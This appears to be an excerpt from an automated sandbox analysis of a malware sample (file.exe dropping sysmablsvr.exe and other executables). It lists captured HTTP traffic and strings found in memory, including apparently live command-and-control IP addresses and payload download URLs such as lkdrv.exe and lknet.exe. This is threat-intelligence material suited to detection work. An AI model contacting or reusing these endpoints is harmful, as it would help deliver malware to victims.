                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:13:02 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:13:04 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: file.exe, sysmablsvr.exe.0.drString found in binary or memory: http://185.215.113.66/
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1.
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1C:
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1F
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4#
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4t
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5%
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5ystem32
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/6
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/6o
                          Source: file.exe, sysmablsvr.exe.0.drString found in binary or memory: http://185.215.113.66/http://77.91.77.92/http://91.202.233.141/123456%s%s%s:Zone.Identifier%userprof
                          Source: file.exe, sysmablsvr.exe.0.drString found in binary or memory: http://77.91.77.92/
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1/3
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1/6
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1/68l
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1/6T
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1:
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/1Microsoft.Wi
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234854329.000000000221B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/2
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/2/5
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234854329.000000000221B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/2/6
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/26
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/26q
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/3P
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/3h
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/4
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/5
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/51
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.92/6
                          Source: file.exe, sysmablsvr.exe.0.drString found in binary or memory: http://91.202.233.141/
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1C:
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1JJC:
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1K
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1Y
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/23
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6%
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6.
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/65P
                          Source: 524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/H
                          Source: 524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/PLTRESA
                          Source: 524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/PLTRESAA
                          Source: 524024912.exe, 00000007.00000000.2434511449.0000000000222000.00000002.00000001.01000000.00000008.sdmp, 524024912.exe, 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmp, 524024912.exe.1.drString found in binary or memory: http://91.202.233.141/PLTRESAMozilla/5.0
                          Source: 524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/PLTRESAd
                          Source: 524024912.exe, 00000007.00000002.2490877099.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/PLTRESAz
                          Source: 524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/PLTRESA~
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://91.202.233.141/lkdrv.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://91.202.233.141/lknet.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://91.202.233.141/lknet.exeCHNOSGDKAUNZGBQABMDEFRITESPLGRnginx.exehttpd.exehttp://twizt.net/chnl
